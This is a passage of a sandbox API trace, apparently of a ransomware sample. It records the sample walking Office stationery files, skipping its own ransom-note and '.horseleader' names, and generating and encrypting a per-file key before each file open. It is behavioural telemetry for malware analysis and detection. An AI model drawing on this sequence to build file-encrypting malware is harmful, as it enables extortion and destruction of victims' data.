ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5015d96, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x444c9a01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xed0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Dotted_Lines.emf", cAlternateFileName="")) returned 1 [0245.746] lstrcmpiW (lpString1="Dotted_Lines.emf", lpString2="Windows") returned -1 [0245.746] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 78 [0245.746] StrStrIW (lpFirst="Dotted_Lines.emf", lpSrch=".horseleader") returned 0x0 [0245.746] lstrcmpW (lpString1="Dotted_Lines.emf", lpString2="#Decrypt#.txt") returned 1 [0245.746] lstrcmpW (lpString1="Dotted_Lines.emf", lpString2="_uninstalling_.png") returned 1 [0245.746] lstrlenW (lpString=".testttjffg") returned 11 [0245.746] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf", lpSrch=".testttjffg") returned 0x0 [0245.746] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.746] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.747] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.747] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce04b5c8, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0245.747] lstrcmpiW (lpString1="Garden.htm", lpString2="Windows") returned -1 [0245.747] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 72 [0245.747] StrStrIW (lpFirst="Garden.htm", lpSrch=".horseleader") returned 0x0 [0245.747] lstrcmpW (lpString1="Garden.htm", lpString2="#Decrypt#.txt") returned 1 [0245.747] lstrcmpW (lpString1="Garden.htm", lpString2="_uninstalling_.png") returned 1 [0245.747] lstrlenW (lpString=".testttjffg") returned 11 [0245.747] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpSrch=".testttjffg") returned 0x0 [0245.747] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.747] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.748] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa410937, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0245.748] lstrcmpiW (lpString1="Garden.jpg", lpString2="Windows") returned -1 [0245.748] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 72 [0245.748] StrStrIW (lpFirst="Garden.jpg", lpSrch=".horseleader") returned 0x0 [0245.748] lstrcmpW (lpString1="Garden.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.748] lstrcmpW (lpString1="Garden.jpg", lpString2="_uninstalling_.png") returned 1 [0245.748] lstrlenW (lpString=".testttjffg") returned 11 [0245.748] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpSrch=".testttjffg") returned 0x0 [0245.748] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.748] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.749] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc50881ad, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc50881ad, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x444efb5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1594, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Genko_1.emf", cAlternateFileName="")) returned 1 [0245.749] lstrcmpiW (lpString1="Genko_1.emf", lpString2="Windows") returned -1 [0245.749] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 73 [0245.749] StrStrIW (lpFirst="Genko_1.emf", lpSrch=".horseleader") returned 0x0 [0245.749] lstrcmpW (lpString1="Genko_1.emf", lpString2="#Decrypt#.txt") returned 1 [0245.749] lstrcmpW (lpString1="Genko_1.emf", lpString2="_uninstalling_.png") returned 1 [0245.749] lstrlenW (lpString=".testttjffg") returned 11 [0245.749] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf", lpSrch=".testttjffg") returned 0x0 [0245.749] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.750] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.751] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc50d4467, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc50d4467, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44515cbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2864, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Genko_2.emf", cAlternateFileName="")) returned 1 [0245.751] lstrcmpiW (lpString1="Genko_2.emf", lpString2="Windows") returned -1 [0245.751] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 73 [0245.751] StrStrIW (lpFirst="Genko_2.emf", lpSrch=".horseleader") returned 0x0 [0245.751] lstrcmpW (lpString1="Genko_2.emf", lpString2="#Decrypt#.txt") returned 1 [0245.751] lstrcmpW (lpString1="Genko_2.emf", lpString2="_uninstalling_.png") returned 1 [0245.751] lstrlenW (lpString=".testttjffg") returned 11 [0245.751] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf", lpSrch=".testttjffg") returned 0x0 [0245.751] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.752] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.752] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5120721, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5120721, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4453be1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1c7f4, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Graph.emf", cAlternateFileName="")) returned 1 [0245.752] lstrcmpiW (lpString1="Graph.emf", lpString2="Windows") returned -1 [0245.752] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 71 [0245.752] StrStrIW (lpFirst="Graph.emf", lpSrch=".horseleader") returned 0x0 [0245.752] lstrcmpW (lpString1="Graph.emf", lpString2="#Decrypt#.txt") returned 1 [0245.752] lstrcmpW (lpString1="Graph.emf", lpString2="_uninstalling_.png") returned 1 [0245.753] lstrlenW (lpString=".testttjffg") returned 11 [0245.753] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf", lpSrch=".testttjffg") returned 0x0 [0245.753] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.753] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.754] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2d2cf5, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2d2cf5, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce071725, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Green Bubbles.htm", cAlternateFileName="")) returned 1 [0245.754] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Windows") returned -1 [0245.754] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 79 [0245.754] StrStrIW (lpFirst="Green Bubbles.htm", lpSrch=".horseleader") returned 0x0 [0245.754] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="#Decrypt#.txt") returned 1 [0245.754] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="_uninstalling_.png") returned 1 [0245.754] lstrlenW (lpString=".testttjffg") returned 11 [0245.754] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpSrch=".testttjffg") returned 0x0 [0245.755] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.755] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.756] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2f8e52, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2f8e52, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa436a95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="GreenBubbles.jpg", cAlternateFileName="")) returned 1 [0245.756] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Windows") returned -1 [0245.756] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 78 [0245.756] StrStrIW (lpFirst="GreenBubbles.jpg", lpSrch=".horseleader") returned 0x0 [0245.756] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.756] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="_uninstalling_.png") returned 1 [0245.756] lstrlenW (lpString=".testttjffg") returned 11 [0245.756] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpSrch=".testttjffg") returned 0x0 [0245.756] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.756] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.757] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fc9adc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4fc9adc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4453be1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="grid_(cm).wmf", cAlternateFileName="")) returned 1 [0245.757] lstrcmpiW (lpString1="grid_(cm).wmf", lpString2="Windows") returned -1 [0245.757] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 75 [0245.757] StrStrIW (lpFirst="grid_(cm).wmf", lpSrch=".horseleader") returned 0x0 [0245.757] lstrcmpW (lpString1="grid_(cm).wmf", lpString2="#Decrypt#.txt") returned 1 [0245.758] lstrcmpW (lpString1="grid_(cm).wmf", lpString2="_uninstalling_.png") returned 1 [0245.758] lstrlenW (lpString=".testttjffg") returned 11 [0245.758] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf", lpSrch=".testttjffg") returned 0x0 [0245.758] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.758] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(cm).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.758] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fa397f, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4fa397f, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44692a69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1d4a, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="grid_(inch).wmf", cAlternateFileName="")) returned 1 [0245.758] lstrcmpiW (lpString1="grid_(inch).wmf", lpString2="Windows") returned -1 [0245.758] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 77 [0245.759] StrStrIW (lpFirst="grid_(inch).wmf", lpSrch=".horseleader") returned 0x0 [0245.759] lstrcmpW (lpString1="grid_(inch).wmf", lpString2="#Decrypt#.txt") returned 1 [0245.759] lstrcmpW (lpString1="grid_(inch).wmf", lpString2="_uninstalling_.png") returned 1 [0245.759] lstrlenW (lpString=".testttjffg") returned 11 [0245.759] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf", lpSrch=".testttjffg") returned 0x0 [0245.759] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.759] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.759] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce0bd9df, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Hand Prints.htm", cAlternateFileName="")) returned 1 [0245.759] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Windows") returned -1 [0245.759] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 77 [0245.760] StrStrIW (lpFirst="Hand Prints.htm", lpSrch=".horseleader") returned 0x0 [0245.760] lstrcmpW (lpString1="Hand Prints.htm", lpString2="#Decrypt#.txt") returned 1 [0245.760] lstrcmpW (lpString1="Hand Prints.htm", lpString2="_uninstalling_.png") returned 1 [0245.760] lstrlenW (lpString=".testttjffg") returned 11 [0245.760] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm", lpSrch=".testttjffg") returned 0x0 [0245.760] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.760] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.761] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce31efaf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce31efaf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa45cbf3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="HandPrints.jpg", cAlternateFileName="")) returned 1 [0245.761] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Windows") returned -1 [0245.761] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 76 [0245.761] StrStrIW (lpFirst="HandPrints.jpg", lpSrch=".horseleader") returned 0x0 [0245.761] lstrcmpW (lpString1="HandPrints.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.762] lstrcmpW (lpString1="HandPrints.jpg", lpString2="_uninstalling_.png") returned 1 [0245.762] lstrlenW (lpString=".testttjffg") returned 11 [0245.762] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg", lpSrch=".testttjffg") returned 0x0 [0245.762] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.762] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.762] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5192b38, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5192b38, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4480f815, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x252ec, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Memo.emf", cAlternateFileName="")) returned 1 [0245.762] lstrcmpiW (lpString1="Memo.emf", lpString2="Windows") returned -1 [0245.762] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 70 [0245.763] StrStrIW (lpFirst="Memo.emf", lpSrch=".horseleader") returned 0x0 [0245.763] lstrcmpW (lpString1="Memo.emf", lpString2="#Decrypt#.txt") returned 1 [0245.763] lstrcmpW (lpString1="Memo.emf", lpString2="_uninstalling_.png") returned 1 [0245.763] lstrlenW (lpString=".testttjffg") returned 11 [0245.763] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf", lpSrch=".testttjffg") returned 0x0 [0245.763] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.763] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.764] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, 